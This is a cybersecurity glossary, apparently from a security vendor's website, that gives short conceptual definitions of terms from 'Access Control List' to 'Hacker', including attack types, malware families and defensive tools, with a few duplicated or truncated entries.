A
Access Control List (ACL)
An access control list (ACL) is a list of permissions or rules that define who or what has permission to access a specific resource, such as computer systems and network resources.
Access Logging
Access logging is the process of recording and storing information about every attempt to access a digital system, server, or application. These records, called access logs, help cybersecurity professionals detect threats, troubleshoot issues, and maintain compliance.
Account Takeover (ATO)
An account takeover, or ATO, is an attack that occurs when a threat actor gains unauthorized access to a user’s account credentials and takes over the account to commit malicious activity, such as fraud or data theft.
Active Directory
Active Directory is a Microsoft Windows directory service that helps administrators configure permissions and network access to ensure security.
Active Directory Security
A directory service offered by Microsoft Windows, Active Directory (AD) helps administrators configure permissions and network access. AD controls who can access what resources, like files and printers, and makes it easier for IT teams to manage the entire network.
Address Resolution Protocol (ARP) Spoofing
ARP spoofing is a cyberattack where a hacker intercepts data by tricking a device into sending messages to the hacker instead of the intended recipient. Also referred to as ARP poisoning.
Advanced Persistent Threat (APT)
An APT is a sophisticated and long-term cyberattack where threat actors secretly gain access to a network to steal sensitive data. These attacks are often highly targeted and difficult to detect, as attackers aim to remain hidden for extended periods.
Adversarial AI
Adversarial AI or adversarial machine learning (ML) looks to ruin the performance of AI/ML systems by manipulating or misleading them. These attacks on machine learning systems can occur at multiple stages across the model development life cycle.
Adversary-in-the-Middle (AiTM)
An AiTM is an attack where the attacker intercepts data from a sender to the recipient and then from the recipient back to the sender. AiTM enables attackers to not just harvest credentials, but steal live sessions, allowing them to bypass traditional phishing prevention controls such as MFA, EDR, and email content filtering. It was formerly known as a Man-in-the-Middle (MitM) attack.
Adware
Adware is software that displays unwanted advertisements on your computer or mobile device. These ads can appear as pop-ups or banners, or even take over your entire screen. While usually not as harmful as other types of malware like viruses or ransomware, adware can be annoying and intrusive, slowing down your device's performance and potentially tracking your online activity for targeted advertising purposes.
Agent
A background program that performs tasks on a computer without direct user interaction.
Air Gap/Wall
An air gap is a security measure that physically isolates a network or device from external networks, including the internet, to prevent unauthorized access.
Air Gapping
Air gapping is a cybersecurity technique where a computer or network is completely disconnected from the internet and any external networks. This physical separation creates a secure environment that’s highly resistant to cyberattacks.
Algorithm
A set of rules or steps a computer follows to solve problems or perform tasks, often used in encryption and data processing.
Allowlisting
Allowlisting is a security measure that permits only pre-approved applications, users, or devices to access systems or networks.
Amazon Web Services (AWS) Cloud Security
Best practices and recommendations for scaling and enhancing security in AWS cloud environments.
AnonFiles
AnonFiles operated as an anonymous file-hosting service that allowed users to upload and share files without registration, personal information, or tracking. While it officially shut down in August 2023, its impact on the cybersecurity landscape continues to influence how we think about anonymous file sharing, threat detection, and organizational security policies.
Anonymizer
An anonymizer is a tool or service that hides your digital identity by masking your IP address and routing your internet traffic through intermediary servers.
Anti-Spyware
Anti-spyware is specialized software designed to detect, prevent, and remove spyware from devices.
Antivirus
Antivirus is a type of software that is designed to prevent, search for, detect and remove viruses and other malware from a computer. AV software is typically installed on the endpoint to block malicious software from infecting the machine, mobile device or network. It works by scanning a file, program or application and comparing a specific set of code with information stored in its database. If the software finds code that is identical or similar to a piece of known malware in the database, that code is deemed malicious and is quarantined or removed.
API Gateway
An API (Application Programming Interface) gateway is software that acts as a go-between for clients (like apps or users) and back-end services.
API Security
API Security is a security practice that entails implementing strategies to protect data confidentiality, integrity, and availability. This includes establishing authentication and authorization protocols to ensure that only authorized users and applications can access the API.
App Server
An application server, or app server, is a software framework that acts as middleware between the front-end client (e.g., a browser or mobile app) and backend systems like databases. App servers manage the dynamic business logic that powers modern applications.
Application Access
Application access refers to the ability of users to utilize software applications within a system or network.
Application Definition
The set of files and custom rules that make up a particular application.
Application Delivery Controller
An Application Delivery Controller (ADC) is a network device that manages and optimizes how applications are delivered to users across networks.
Application Exploits
These occur when cyber threat actors take advantage of vulnerabilities within an application, usually to gain unauthorized access.
Application Performance Monitoring
Application Performance Monitoring (APM) is a strategy used to track the performance and availability of software applications to ensure they provide a high-quality user experience and meet service-level agreements.
Application Security Engineer
Application security engineers are the people making sure your application software isn’t a vulnerable target for cyberattacks. These specialized security engineering gurus keep applications safe from threat actors who steal data, crash systems, and wreck reputations.
Application Security Orchestration and Correlation (ASOC)
ASOC tools are a category of application security (AppSec) solutions designed to streamline and automate key workflows and security processes. These tools assist development teams in automating vulnerability management, risk assessment, and remediation and orchestrating data from various security solutions, thereby enhancing vulnerability testing and remediation through workflow automation.
Application Security Posture Management (ASPM)
ASPM is a vital practice focused on ensuring applications meet stringent security standards and identifying vulnerabilities.
Application Services
Application services form the backbone of modern IT environments. Think of them as specialized workers in a digital factory—each one has a specific job to do, and they all work together to keep your business running smoothly.
Application Whitelisting
Application whitelisting is a security approach where only pre-approved applications are permitted to run on a system. Any software not on the approved list is automatically blocked by default. This proactive security method is grounded in the principle of "allowlisting," offering a controlled environment to prevent unauthorized or malicious software from running.
AppSec
The process of finding, fixing and preventing security vulnerabilities at the application level, as part of the software development process.
Artificial Intelligence
Artificial intelligence refers to computer systems that can perform tasks typically requiring human intelligence—like recognizing patterns, making decisions, and learning from experience.
Asset
An asset in cybersecurity is any physical or digital resource that has value to an organization and requires protection from cyber threats. Assets include hardware like servers and laptops, software applications, data and databases, network infrastructure, and even people within the organization.
Asymmetric Algorithm
An asymmetric algorithm is a type of public-key cryptography that uses two mathematically linked keys, one that is public for encryption and one that is private for decryption.
Attack Vectors
An attack vector is the method or combination of methods that cybercriminals use to breach or infiltrate a victim’s network illegally. Attack vectors are often complex and involve gathering intelligence and identifying weak points for exploitation to gain network access.
Audit Event
An audit event is any security-relevant occurrence within a system that is logged for review.
Audit File
A file containing a collection of audit events, providing a record of system activity.
Audit Log
An audit log is a chronological, time-stamped record of every action and event that happens within a system or network.
Authentication
Authentication is the process of verifying a user's or device's identity. Methods include passwords, biometrics (fingerprints, facial recognition), and security tokens.
AutoScanning
AutoScanning is an automated cybersecurity process that continuously monitors systems, networks, and applications for vulnerabilities, malware, and security threats without requiring manual intervention.
B
Backdoor Attacks
Similar to a secret entrance into a house, backdoor attacks are hidden ways of bypassing normal authentication to get unauthorized access to a system. Backdoors can be intentionally created by attackers or unintentionally left by developers during the software development process.
Backup
Typically involving online or offsite storage, a backup (or backing up) saves data to a separate location to ensure its recovery in case of loss or damage.
BAT file
A .BAT file (short for “batch file”) is a type of script file that automates commands on Windows systems. It carries out tasks by running a series of commands in sequence, using the Windows Command Prompt.
User behaviors are analyzed within networks and applications to find unusual activity that may indicate a security threat. This can involve monitoring user activities like logins, file access, and email interactions to find deviations from typical patterns, and examining the system itself for anomalies like unexpected resource consumption, unusual network traffic, or unexpected software changes.
Big Game Hunting
Big Game Hunting (BGH) is a term used to describe sophisticated ransomware attacks that specifically target high-value organizations. These attacks are meticulously planned and aim for maximum financial gain by attacking businesses, hospitals, and government institutions.
Binary Code
Binary code is a coding system built on two symbols, typically 0 and 1, forming the binary number system. These symbols represent the “off” and “on” states of electronic circuits, enabling machines to process complex data.
Black Hat
A black hat describes a threat actor who uses advanced hacking skills for malicious purposes. They exploit vulnerabilities to steal data, disrupt services, or cause harm.
Blackholing
Blackholing is used to combat cyberattacks, especially DDoS attacks, by dropping harmful traffic. This method protects networks without affecting legitimate traffic. You’ll learn how it works, when to use it, and its limitations in risk management.
Blocklist
A blocklist is a security mechanism that blocks or prohibits the execution of programs on a known malicious list. It’s also a firewall list created to block IPs with malicious reputations.
Blue Team
Blue Team is a group of cybersecurity professionals responsible for defending an organization's systems and data by proactively identifying vulnerabilities and neutralizing potential threats.
Bluejacking
Bluejacking is a type of Bluetooth prank where someone sends unsolicited messages to nearby devices with Bluetooth enabled. It does not involve taking control of the device or accessing its data.
Bootkit
A bootkit is a type of malware designed to infect a computer’s boot process and gain deep, persistent control before the operating system even starts.
Bot Cybersecurity
Bots, also known as robots or chatbots, are automated software programs that perform tasks and simulate human conversation. In cybersecurity, bots can be used for various purposes, from threat detection to responding to customer inquiries.
Bot Mitigation
Bot mitigation is the practice of spotting and preventing malicious bots from acting before they wreak havoc on your website, app, or network.
Botnet
A botnet is a collection of computers compromised by malicious code used to run a remote control agent, granting an attacker the ability to take advantage of system resources. Typically used for DDoS attacks, hosting false web services, or transmitting spam.
Bracketing
Bracketing in cybersecurity is the practice of limiting access to sensitive systems or data by granting permissions narrowly for only what’s needed, and only for the time it’s needed. It’s like having just the right key for one door instead of a master key for the whole building.
Brandjacking
Brandjacking is the unauthorized use of a company's brand identity—including logos, domain names, social media profiles, and other brand assets—to deceive victims and carry out malicious activities.
Bring Your Own Device (BYOD)
A BYOD policy allows employees to use personal devices for work, which can introduce security risks if not properly managed.
Browser Extension
A browser extension is a small software module that adds functionality to your web browser. Examples include ad blockers, password management tools, or dark mode toggles.
Brute Force Attack
A brute force attack is a type of cyberattack that uses trial and error to guess login credentials and encryption keys systematically until successful.
BSOD
BSOD stands for "Blue Screen of Death" which is the official stop error on a Windows machine that indicates a critical problem it cannot recover from without a reboot.
Bug Bounty Hunter
A bug bounty hunter is an ethical hacker who participates in bug bounty programs to find and report security flaws in websites, apps, or other digital systems for a reward or recognition. They help organizations identify and fix vulnerabilities before cybercriminals can exploit them.
Built-in Tools
Built-in tools are pre-installed software utilities and features that come embedded within operating systems, applications, or cybersecurity platforms without requiring separate downloads or installations. These tools are ready to use right out of the box and provide essential functionality for system administration, security monitoring, and threat detection.
Business Email Compromise (BEC)
Business email compromise (BEC) is a phishing scam where threat actors impersonate a trusted source to convince others to give them sensitive information or take specific action.
C
Canary
Named after the songbirds, ransomware canaries are physical or virtual devices that mimic other devices to lure attackers, helping study their behaviors.
CAPTCHA
CAPTCHA stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. It’s designed to differentiate humans from bots by presenting tasks that are easy for people but difficult for automated programs. CAPTCHA helps safeguard websites from spam, fraud, and malicious bot activities.
Chain of Trust
The chain of trust in cybersecurity refers to a set of hierarchical relationships where trust is passed down from one entity to another. Each component in the system guarantees that the next is verified before execution to ensure that only authorized hardware and software are used within secure environments.
CIS Benchmarks
Developed by the Center for Internet Security, CIS benchmarks are comprehensive security configuration guidelines for specific technologies to help organizations fight cyber threats.
CISO
A Chief Information Security Officer (CISO) is a senior executive responsible for designing and implementing an organization's cybersecurity strategy. The role goes beyond technical expertise; it demands strategic thinking, leadership, and the ability to bridge the gap between security concerns and business objectives.
ClickFake Interview
A clickfake interview is a fake job interview designed by cybercriminals to deceive targets into clicking malicious links, downloading malware, or sharing sensitive information. Think of it as a social engineering trap aimed at job seekers and companies alike.
Clickjacking
Clickjacking, also known as a UI redress attack, is a method used by hackers to trick users into clicking something different from what they intend. Using deceptive design techniques, attackers overlay hidden or invisible elements (like buttons or links) over seemingly harmless interfaces.
Clientless VPN
A clientless VPN is a type of Virtual Private Network that allows users to connect securely to corporate resources through a web browser without installing dedicated VPN software on their devices.
Closed-Source Software
Closed-source software is proprietary software where the original source code is not shared with the public, allowing the owner to maintain exclusive control over its development and distribution.
Cloud Access Security Broker (CASB)
A security checkpoint between cloud users and applications, CASB manages and enforces data security policies including authentication and encryption.
Cloud Application Security
Cloud application security is the process of securing cloud-based software applications throughout the development lifecycle.
Cloud Application Security
Protecting cloud-based software applications throughout their development lifecycle.
Cloud Based
Cloud-based means storing, managing, or accessing your data and apps over the internet, not on your computer or servers. Instead of buying and maintaining physical hardware, you use remote resources from a third-party provider.
Cloud Compromise Assessment
In-depth evaluations of cloud infrastructures to identify and mitigate security risks, ensuring a strong security posture.
Cloud Computing
Cloud computing provides online access to shared pools of configurable computing resources like servers, storage, applications, and services.
Cloud Data Security
Cloud data security is the technologies and policies that protect data in the cloud from loss, leakage, misuse, breaches, and unauthorized access.
Cloud Governance
Cloud governance is a collection of policies and practices that control how an organization uses cloud computing resources. It ensures security, compliance, and efficient operation by setting clear rules for accessing and managing cloud systems.
Cloud Incident Response
Procedures to follow when a cybersecurity incident occurs in a cloud environment.
Cloud Native
Cloud native refers to the principles and practices for building secure applications in the cloud, essential for modern software development.
Cloud Security Architecture
The comprehensive framework of hardware, software, and infrastructure protecting cloud environments and their components.
Cloud Security Best Practices
Cloud security best practices are recommended practices for organizations to implement during cloud adoption to protect against cyberattacks.
Cloud Security Frameworks
Cloud security frameworks are structured sets of guidelines and best practices designed to help organizations secure their cloud environments and ensure compliance with regulatory standards.
Cloud Security Frameworks
Sets of guidelines and controls for securing data, applications, and infrastructure in cloud computing environments.
Cloud Workload Protection (CWP)
Cloud Workload Protection, or CWP, is a cybersecurity solution designed to monitor, detect, and defend runtimes like applications, containers, virtual machines, and serverless functions across cloud environments.
Cloud-based
Systems, applications, and operations hosted or conducted over the internet.
Code Security
Code security is the practice of protecting software code from vulnerabilities that could be exploited by cyber attackers. It involves identifying, managing, and eliminating weaknesses during the software development lifecycle to ensure applications are safe and secure.
Cold Storage
Cold storage is a method of archiving data by storing the data on a database that is typically not quickly accessible.
Command and Control Center
A command and control (C2) center, or C2 server, in cybersecurity refers to the infrastructure used by cybercriminals to communicate and control compromised devices in targeted networks. Once malware infects a device, attackers use this server to issue commands, extract stolen data, and maintain control.
Common Cash App Scams
Fraud schemes targeting Cash App users range in complexity, but most involve exploiting human trust through manipulation or social engineering.
Compiler Security
Compiler security refers to the practice of protecting software applications from vulnerabilities that can be introduced or exploited during the compilation process, as well as implementing security measures within compilers themselves to prevent malicious code injection and ensure safe code generation.
Computer Worm
A computer worm is a standalone malware program that can replicate itself and spread across networks without needing any input from you.
Conditional Access
Conditional access (CA) is a security process that decides who gets access to your organization’s resources, under what conditions, and based on real-time contexts.
Container
A lightweight package of application code with dependencies such as a specific version of programming language runtime and libraries required to run a software service. Common container software are
Container Security
Container security refers to the practices, tools, and policies designed to protect containerized applications, their underlying infrastructure, and their entire lifecycle—from development to deployment and runtime.
Containerization
Containerization is a method of virtualization. Instead of virtualizing all components of a physical machine like in the case of Virtual Machines (VMs), containers only virtualize applications and their dependencies.
Conti Ransomware
Conti is a highly sophisticated ransomware strain designed to encrypt files and extort money from its victims. First observed in 2020, Conti ransomware has become infamous for targeting organizations globally and demanding large ransoms, often disrupting business operations during attacks.
Continuous Monitoring
Continuous monitoring is the practice of constantly keeping tabs on your IT systems for any suspicious or malicious activity.
Cookies
Cookies are small text files created by websites and stored on your browser, used to recognize you and track certain aspects of your activity.
Credential Stuffing
Credential stuffing is a type of cyberattack where stolen username-password combos (from past breaches) are reused in automated login attempts across various platforms.
Credential Theft
The act of stealing personal information such as usernames, passwords, and financial information to gain unauthorized access.
Crypto Key
A crypto key is a digital password that lets you encrypt and decrypt sensitive data.
Cryptocurrency
Cryptocurrency is digital or virtual currency, often demanded in ransomware attacks due to its decentralized and untraceable nature.
Cryptographer
A cryptographer protects data through encryption, ensuring that private information stays that way. Using mathematics and computer science, cryptographers create algorithms and security protocols that encrypt sensitive data, making it accessible only to authorized users.
Cryptographic Algorithm
A cryptographic algorithm is a complex set of mathematical instructions designed to transform readable data (plaintext) into coded gibberish (ciphertext)—and back again for those who hold the proper key.
Cryptor
A cryptor is a software tool used to encrypt or otherwise obfuscate the code within malware. Its main goal is to hide the code's true purpose from security systems like antivirus software or static-analysis tools, ensuring the malware remains undetected until it activates.
CTF
Capture The Flag (CTF) is a cybersecurity exercise where participants find hidden text strings, called "flags", in vulnerable programs or websites. The Huntress CTF is our yearly month-long competition of daily challenges designed for experts and enthusiasts alike.
CVSS - Common Vulnerability Scoring System
CVSS, the Common Vulnerability Scoring System, is a standardized framework used to assess and communicate the severity and risk level of software vulnerabilities.
Cyber Insurance
Cyber insurance is financial protection for businesses if a cyberattack happens. It can cover costs associated with data breaches like legal fees, reputation damage, and business interruption.
Cyber Operations
Cyber operations are activities that protect, secure, or target computer networks and systems to achieve specific objectives.
Cyber Risk Analyst
A cyber risk analyst identifies, evaluates, and helps manage the risks that threaten a company’s digital assets. Their job is to figure out which cyber threats can happen, how likely they are, and what damage they could cause, and then offer practical ways to defend against them.
Cyber Threat
A cyber threat is any shady move in cyberspace to damage, disrupt, steal, or get unauthorized access to computer networks or systems. It’s any potential danger posed by hackers, viruses, insider risks, or badly managed software that compromises security controls.
Cyberattack
A cyberattack is defined as any malicious attempt to disrupt, damage, or gain unauthorized access to computer systems, networks, or devices.
Cybercriminals
Cybercriminals are individuals or groups who initiate cyberattacks, also known as threat actors.
Cybersecurity
Cybersecurity refers to the practices, technologies, and processes designed to protect internet-connected systems, including computers, networks, and data, from cyber threats like malware and ransomware.
Cybersecurity Manager
A cybersecurity manager oversees an organization's security operations, leading teams to protect against cyber threats and ensure compliance with security policies. They bridge the gap between technical security measures and business strategy, managing both people and technology to maintain a strong security posture.
Cybersquatting
Cybersquatting is registering and using an internet domain name identical or similar to trademarks, service marks, personal names, or company names with the intent of hijacking traffic for financial profit or delivering malware payloads.
Cyberweapon
At its core, a cyberweapon is a software-based tool or malicious code designed to disrupt, damage, or gain unauthorized access to information systems, networks, or physical infrastructure.
D
Dangling Markup
Dangling markup refers to unclosed or partially completed HTML tags within a web page’s code. Cyberattackers exploit this vulnerability to inject malicious code into a site, often exposing sensitive data or enabling unauthorized actions.
Dark Net
While the dark net does have its shadowy corners, the truth is nuanced. It’s a hidden layer of the internet that most of us will never see, but for cybersecurity professionals, IT experts, and even curious researchers, understanding it is critical to staying ahead of threats in today’s online landscape.
Dark Web Activity
Dark web activity refers to actions occurring on the “dark web,” a hidden part of the internet not indexed by search engines. This includes both legitimate uses, like maintaining privacy, and illicit activities such as illegal data trading and cybercrime operations.
Dark Web Monitoring
Dark web monitoring is the process of searching for and tracking your organization's information on the dark web. This includes leaked passwords, stolen credit card information, or even intellectual property. By detecting these breaches early on, people and organizations can take steps to mitigate the damage and prevent further harm.
Data Breach
A data breach describes a security incident where data is illegally accessed, stolen, or released by an unauthorized individual or group. This can include personal data like Social Security numbers and financial information, as well as corporate data like customer records and intellectual property.
Data Compliance
Data compliance is the practice of ensuring your company handles information in line with laws and standards, proving you know how to protect sensitive data.
Data Encryption
Data encryption is the process of converting readable data (plaintext) into an unreadable format (ciphertext) using mathematical algorithms and secret keys.
Data Encryption Standard
Data Encryption Standard (DES) is a type of symmetric key encryption used to protect digital data.
Data Exfiltration
Data exfiltration refers to the unauthorized transfer of data from a device or network. Cybercriminals use malware, insider threats, or vulnerability exploitation to steal data and transmit it to locations under their control. Threat actors can then use stolen data for malicious purposes like identity theft, espionage, or financial gain.
Data Flow Mapping
Data flow mapping is the process of visually charting and tracking how data moves through a system, from the moment it’s collected to when it’s deleted or archived. It provides a clear view of data journeys, enabling organizations to identify vulnerabilities, enhance security, and comply with privacy laws such as GDPR.
Data Logging
Data logging is the digital equivalent of a security camera system. It is the process of automatically collecting and storing data from various sensors and points within a system over time.
Data Loss Prevention (DLP)
Data loss prevention (DLP) is a set of policies, practices, and tools used to make sure sensitive data isn’t lost, misused, or accessed by unauthorized users. DLP solutions perform both content inspection and contextual analysis of data sent from or across corporate networks to give visibility into who is accessing data and systems (and from where) and filter data streams to restrict suspicious or unidentified activity.
You can use DLP solutions to reduce the risk of sensitive data leaking outside your organization, and some solutions go beyond simple monitoring and detection to give alerts, enforce encryption, and isolate data as needed.
Data Obfuscation
Data obfuscation hides sensitive data by replacing, masking, or scrambling it so unauthorized users can’t read or misuse it.
Data Onboarding
Think of data onboarding as the gateway between raw security information and actionable threat intelligence. Just like onboarding a new employee involves gathering their information, setting up systems, and ensuring they can work effectively, data onboarding takes scattered security logs and transforms them into a unified, analyzable format.
Data Plane
The data plane is the network component responsible for actually forwarding data packets from one location to another. It's the "worker" of the network that handles the heavy lifting of moving your data around.
Data Poisoning
Data poisoning is a form of cyberattack where malicious actors intentionally manipulate the training data of machine learning (ML) models to influence their outcomes. This can significantly alter the effectiveness and accuracy of the models, often with harmful consequences for organizations relying on AI and ML systems.
Data Portability
Data portability is the ability to transfer personal data easily from one service provider to another.
Data Privacy
Data privacy in cybersecurity refers to protecting personal or organizational data from being accessed, misused, or shared without consent.
Data Protection vs. Data Security
Data protection focuses on safeguarding personal data from corruption, compromise, or loss, while data security encompasses all measures to guard against unauthorized access to digital data.
Data Sovereignty
Data Sovereignty is the legal principle that digital data is subject to the laws and governance of the specific country or jurisdiction in which it is physically located.
Data Traffic
Data traffic is what is generated every time an email is sent, a video is watched, or a website is visited. It is traffic that travels across a network to reach its destination.
Database Monitoring
Database monitoring involves continuously tracking database activities to optimize performance and ensure security. This combines performance monitoring like CPU usage and memory consumption, security monitoring for suspicious activities, and accessibility monitoring.
DDoS
Distributed Denial of Service (DDoS) is when multiple systems coordinate an attack to overwhelm a system or network, making it unavailable to users.
Decompiler
At its core, a decompiler is a tool that takes machine-readable code (compiled code) and converts it back into human-readable, high-level code. It reverses the process of compilation. While compilers transform human-friendly code into machine-readable code that a computer can run, decompilers go the other way around.
Deep Web vs Dark Web
While both are hidden from search engines, the deep web consists of legitimate, password-protected content like online banking and private databases, whereas the dark web is a small, intentionally hidden subset that requires specialized software like Tor to access for purposes of anonymity and sometimes illicit activity.
Deepfake
A deepfake is a video or audio clip generated using artificial intelligence (AI) that mimics a person’s likeness or voice to depict events or statements that never actually happened. These AI-forged creations can seem incredibly realistic and are often used in scams, misinformation campaigns, and other forms of digital manipulation, sparking significant cybersecurity concerns. The word "deepfake" is a mash-up of “deep learning” (a type of AI) and “fake,” describing how this technology uses advanced machine learning to create realistic imitations.
Default Deny
A default deny approach in cybersecurity is a strict security policy that blocks all actions unless explicitly permitted.
Dependencies
Files required for software to run, such as DLLs in Windows.
Detection Engineering
Detection engineering is the process of designing, building, and refining custom ways to spot cyber threats in real time.
Dictionary Attack
Ever wondered how hackers crack passwords so quickly? While movies show dramatic keyboard battles, the reality is often much simpler—and scarier. Dictionary attacks represent one of the most straightforward yet effective methods cybercriminals use to break into accounts, and they're happening right now across the internet.
Digital Certificate
A digital certificate is like an online passport. It’s an electronic document used to prove the authenticity of a website, server, user, or device. It ensures that the entity you’re interacting with is who they say they are.
Digital Footprint
A digital footprint is the data you create whenever you use the internet, including things you post, share, or interact with online.
Digital Signature
A digital signature is a cryptographic technique that ensures the authenticity and integrity of a digital message or document.
Disaster Recovery (Plan)
Procedures to recover data and operations following a cyberattack.
Disaster Recovery Plan
A disaster recovery plan is a business's documented plan that outlines how an organization will restore IT infrastructure, data, and critical business operations following a disruptive event.
DLP
Data Loss Prevention is a solution that detects and blocks the extraction of sensitive data by internal or external sources.
DNS Changer
DNS Changer is a type of malware that alters a device's Domain Name System (DNS) settings to redirect users to fraudulent or malicious websites without their knowledge.
DNS Poisoning
DNS poisoning, also known as DNS spoofing or DNS cache poisoning, involves injecting fake data into a DNS resolver's cache. This attack leads users to malicious websites instead of their intended destination.
DNS Protection
DNS protection is a security service that filters and blocks malicious domain requests before they can establish connections to harmful websites or servers.
DNS Sinkhole
Think of DNS sinkholing as setting up a fake address that leads nowhere. When a device on your network tries to connect to a malicious website, instead of getting the real IP address, it receives a bogus one that either goes nowhere or leads to a server you control.
DOC Files
DOC files represent a significant component of organizational document management and can present unique security challenges.
Domain Admin Groups
Domain admin groups are groups with administrative rights across all domains within an organization, typically found in Windows Active Directory.
Double Tagging
Double Tagging is a sophisticated network attack where a hacker adds an extra VLAN tag to a data packet to bypass security controls and gain unauthorized access to a different VLAN.
Downgrade Attack
A downgrade attack is a type of man-in-the-middle (MITM) attack where a hacker forces your system to drop down to an older, less secure protocol or encryption method, even when newer, safer versions exist.
Downloader
A downloader is a type of malicious software designed to install additional harmful programs onto a victim’s device without their knowledge.
Doxware
A type of ransomware that threatens to release sensitive data if the ransom is not paid.
DTLS - Datagram Transport Layer Security
Datagram Transport Layer Security (DTLS) is a security protocol based on TLS that provides encryption, integrity, and authentication for real-time, delay-sensitive applications like VoIP and gaming that use the fast but "unreliable" User Datagram Protocol (UDP).
Dump data
Dump data is a complete copy of information from a database that's been exported into a structured file format. It includes both the actual data stored in the database and the underlying structure that defines how that data is organized.
Dynamic ACLs
Advanced ACLs requiring user authentication before accessing resources.
E
EDR vs MDR vs XDR
Learn the differences between endpoint detection and response (EDR), managed detection and response (MDR) and extended detection and response (XDR).
Elevation Control
Users typically have limited access to a system. To do certain tasks (like installing software or modifying system settings), they might need more privileges (like administrator rights). Elevation control lets users run specific applications as administrators without having admin privileges.
Elevation Control in Endpoint Management
Elevation control is a cybersecurity practice that manages and restricts when users can access elevated privileges (like administrator rights) on computer systems. Rather than giving users permanent admin access, elevation control grants these higher-level permissions only when specific, approved applications need them.
Email Spoofing
Email spoofing is a type of cyberattack that targets businesses by using emails with forged sender addresses. Because the recipient trusts the alleged sender, they’re more likely to open the email and click on things like malicious links or attachments.
EMV - Europay Mastercard & Visa
EMV is a global payment standard for chip-based debit and credit cards that provides enhanced security against fraud compared to traditional magnetic stripe cards.
Encryption
Encryption is the process of converting data into a coded format to prevent unauthorized access.
End-to-end encryption
End-to-end encryption is a method of securing communication by ensuring that only the sender and the intended recipient can read the messages or access the data being exchanged.
Endpoint
Devices like computers, mobile phones, and servers that connect to and communicate with a network.
Endpoint Detection and Response (EDR)
An integrated endpoint security solution designed to detect, investigate, and respond to cyber threats. EDR solutions offer greater visibility into what’s happening on endpoints by recording granular endpoint activity and monitoring for signs of malicious behavior. If the EDR technology detects any of these malicious signs, it provides security analysts with the information needed to conduct both reactive and proactive threat investigations and minimize the impact of an attack.
Endpoint Monitoring
Endpoint monitoring involves the continuous monitoring and management of devices that connect to a network, such as computers, mobile devices, and servers.
Endpoint Protection Platforms (EPP)
Security technologies such as antivirus, data encryption, and data loss prevention that work together to detect and prevent security threats.
Enterprise Solutions
Enterprise solutions are software designed to integrate multiple systems within an organization to streamline processes.
Event Logging
Event logging is the act of recording every action—from user logins to system errors—with timestamps, making it possible to reconstruct what happened during security incidents.
Evil Twin Attack
An Evil Twin Attack is a sophisticated type of Man-in-the-Middle (MitM) attack where a cybercriminal deploys a fraudulent Wi-Fi access point that mimics a legitimate network.
Executables
Executables are computer files containing machine code that performs specific tasks or runs applications when executed by a processor, but they can also harbor malicious risks like malware.
Executables
Code files or programs that instruct a computer to perform specific actions when opened.
Exploit
An exploit is the act of taking advantage of vulnerabilities in systems or software to perform malicious acts.
Exploit Kit
An exploit kit is a pre-packaged toolkit used by cybercriminals to automatically identify and exploit vulnerabilities on a user's device to deliver malware.
Exploit Pack
An exploit pack is a collection of exploit code bundled together and designed to target multiple software vulnerabilities simultaneously.
Exploitation in the Wild (ITW)
“Exploitation in the Wild” refers to the active use of software vulnerabilities by cybercriminals in real-world attacks.
Extended Detection and Response (XDR)
Extended Detection and Response (XDR) is a comprehensive cybersecurity platform that collects and correlates threat data from multiple security layers—including endpoints, networks, cloud environments, and identity systems—to provide unified threat detection, investigation, and response capabilities.
Extensible Authentication Protocol
Extensible Authentication Protocol (EAP) is a security framework that allows networks to support multiple authentication methods, such as passwords, certificates, and smart cards. EAP is critical for controlling who gets access to wireless networks, VPNs, and more, making it a must-know for cybersecurity professionals.
F
False Flag
A false flag in cybersecurity is when bad actors launch an attack but pretend to be someone else.
False Positive
A false positive occurs when antivirus software mistakenly flags a legitimate file or program as malicious. This means the file is safe to use, but due to its characteristics or behavior, your antivirus incorrectly categorizes it as harmful.
FDE Security
Full disk encryption (FDE) encrypts everything on your hard drive, including the operating system, applications, and user data. It provides automatic, transparent protection without requiring users to manually encrypt files. FDE is essential for compliance with data protection regulations like GDPR and HIPAA.
FQDN
FQDN stands for Fully Qualified Domain Name and is the complete address of a resource on the Internet or a private network.
Federal Information Security Management Act (FISMA)
FISMA is a U.S. federal law enacted in 2002 that requires federal agencies to implement information security programs to protect their data and information systems. It sets standards for how agencies should assess, manage, and mitigate cybersecurity risks.
File Integrity Monitoring (FIM)
File Integrity Monitoring is a security process that monitors and analyzes the integrity of assets including file systems, directories, databases, and the operating system.
Fileless Malware
Fileless malware operates entirely within a computer's memory without ever touching the hard drive. This malicious software may utilize legitimate tools or embed code in legitimate files, making detection challenging.
Firewall
A firewall is a security system that monitors and filters incoming and outgoing network traffic to prevent unauthorized access to an organization's network. It acts as an outer barrier that either allows or blocks network traffic based on a predefined set of rules.
Footholds
Footholds are methods used by threat actors to reinstall malware on a device after it has been cleaned. Also known as “Persistence Mechanisms.”
Forensic Analyst
At its core, the role of a forensic analyst is a mix of detective work and tech wizardry. They don’t just investigate cyber incidents; they uncover entry points, analyze attacker behavior, and figure out the root cause.
Form grabber
A form grabber is a type of malicious software that secretly captures data entered into web forms, such as login credentials, credit card numbers, and personal information, before it gets encrypted and transmitted to legitimate websites.
Fraud Prevention
Fraud prevention is the comprehensive set of proactive strategies, policies, and technologies designed to identify, deter, and stop fraudulent activities before they can cause financial or reputational damage to an organization.
Full Disk Access (FDA)
A macOS TCC permission that allows software to access sensitive user information.
G
General Data Protection Regulation (GDPR)
The GDPR is a European Union regulation on information privacy that governs how the personal data of people in the EU can be processed and transferred.
Generic Device
A generic device is any unidentified system, often lacking device-specific classification, that connects to a network.
Glitching
Glitching is disrupting a device’s hardware in carefully targeted ways to force the device to behave unexpectedly, potentially bypassing its security measures.
Golden Ticket Attack
A Golden Ticket attack refers to exploiting weaknesses in Kerberos to gain unauthorized access to Windows Active Directory controls, requiring initial system access.
Google Cloud Platform (GCP)
Google Cloud Platform (GCP) is a suite of cloud computing services provided by Google that allows organizations to build, deploy, and scale applications using the same infrastructure that powers Google’s own products.
Google Cloud Platform (GCP)
Google Cloud Platform is one of the 3 major cloud providers. GCP lets businesses use Google's infrastructure and technology to build and run applications, analyze data, and power their operations.
Google Dorking
When you think of Google, you probably imagine searching for recipes, troubleshooting tech issues, or finding the best local pizza. But in the wrong hands, Google can also be used for something far more dangerous: Google Dorking.
Grabber
A grabber is a type of malicious software (malware) used to secretly capture and steal sensitive information, like passwords, from a victim’s device. Think of a grabber as a data thief running quietly in the background, pocketing secrets you didn’t mean to share.
H
Hacker
A hacker is someone who uses their technical know-how of computers, programming, or networking for unauthorized access to systems or networks.
